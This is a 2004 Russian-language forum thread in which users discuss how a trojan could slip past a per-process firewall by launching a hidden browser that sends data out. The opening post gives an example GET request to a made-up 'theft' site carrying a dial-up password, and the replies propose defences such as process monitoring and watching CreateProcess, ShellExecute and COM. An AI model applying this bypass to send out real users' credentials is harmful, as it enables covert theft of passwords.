Новая для меня уязвимость

← →
Piter © (2004-07-28 01:11) [0]

Почитал тут форум и открыл новую для себя опасность. Все таки чувствовал себя за firewall"ом как за стеной. У меня все настроено по процессам, ни одна тварь не пробежит.

Но ведь действительно, можно использовать IE (да и любой браузер, фанаты оперы не обольщайтесь), чтобы он передавал информацию на какой-нибудь сайт... скрытно передавал. Достаточно запустить невидимую его копию с адресом GET запроса, типа http://www.super-puper/vorovstvo.cgi?DialUpPassword=XXXXX . А в firewall естественно для браузера соединения по HTTP разрешены любые.

Я то думал - даже если нечаянно подцеплю трояна - все равно могу его вычислить файерволом... а тут вот что можно придумать оказывается.

Народ, предлагайте средства защиты. Мне кажется проблема достаточно серьезная. Это получается троян спокойно может выходять на связь в интернет минуя firewall... Хреново!

← →
Sanek_metaller © (2004-07-28 01:17) [1]

Молодец рассказал всем,ща все побегут трояны писать:)

← →
Sanek_metaller © (2004-07-28 01:19) [2]

После слова "Молодец" должна стоять запятая:)

← →
GanibalLector © (2004-07-28 01:28) [3]

Ну,может мониторы поставить всякие...Знаешь,вот есть PortMon или FileMon.Так вот...наверняка есть и такие.

← →
Fktrc (2004-07-28 07:18) [4]

Попробуй пользоваться браузером, который позволяет запрещать запуск других своих копий. Такие браузеры как правило MDI, так что ты хотя бы увидишь, что запрос с паролем был открыт в новом child-окне и сможешь оперативненько его сменить, а потом искать заразу...

← →
тихий вовочка © (2004-07-28 07:48) [5]

Против штучных вирусов и троянов сложно искать защиту, а против массовых выпускают обновления к антивирусникам. Если очень страшно - указывай в настройках IE несуществующий прокси, а сам пользуйся каким-либо другим браузером. Тогда твой шпионский запрос будет каждый раз получать проблемы с коннектом.

← →
Piter © (2004-07-28 12:52) [6]

Fktrc (28.07.04 7:18) [4]

вероятно, ты прав. Придется переходить на какой-нибудь MyIE... кто-нибудь подскажет его оффициальную страничку?

В IE еще есть уязвимости, которые из JS проги запускают.

>Придется переходить на какой-нибудь MyIE...
мне кажется легче увидеть мелькнувшее окошко в таскбаре, чем мелькнувшее окошко в MDI. тем более, что закрыть эту страничку через JS для троянописателя не проблема.

но имхо, это совершенно не в ту степь...

между прочим, дело вовсе не в браузере. проблема может быть с любой программой, которой фаервол автоматически разрешает какие-то действия и которая допускает какое-то внешнее управление. например, если фаервол абсолютно доверяет программе типа ftp (которая может обрабатывать скрипты), то данные можно отослать через нее.

я вижу сейчас 3 способа запустить программу и передать ей данные извне:
1. запуск процесса (с некоторыми параметрами коммандной строки или как-нибудь еще - посылкой сообщений и т.п.) - в любом случае, используется CreateProcess.
2. открытие файла, с которым ассоциирована программа через ShellExecute.
3. запуск или управление запущенной копией программы через COM.

итак, нужен фаервол, который отслеживает CreateProcess и позволяет запускать программы, авторизованные на доступ вне только программам авторизованным на это. абсолютно не уверен, но думаю этого достаточно, чтобы перекрыть метод 2 (CreateProcess заведомо вызывается, и я думаю, что в том же процессе, что вызвал ShellExecute). с COM-ом нужно отдельно разбираться, поскольку запуск нового процесса может не происходить.

что-то у меня дежа вю, что какой-то известный фаервол умеет это делать.

подумал еще чуть-чуть - в принципе, если программа запущена, то теоретически может и любой метод InterProcessCommunication что-то через нее сделать. например, просто посылка сообщений.

Новая для меня уязвимость Найти похожие ветки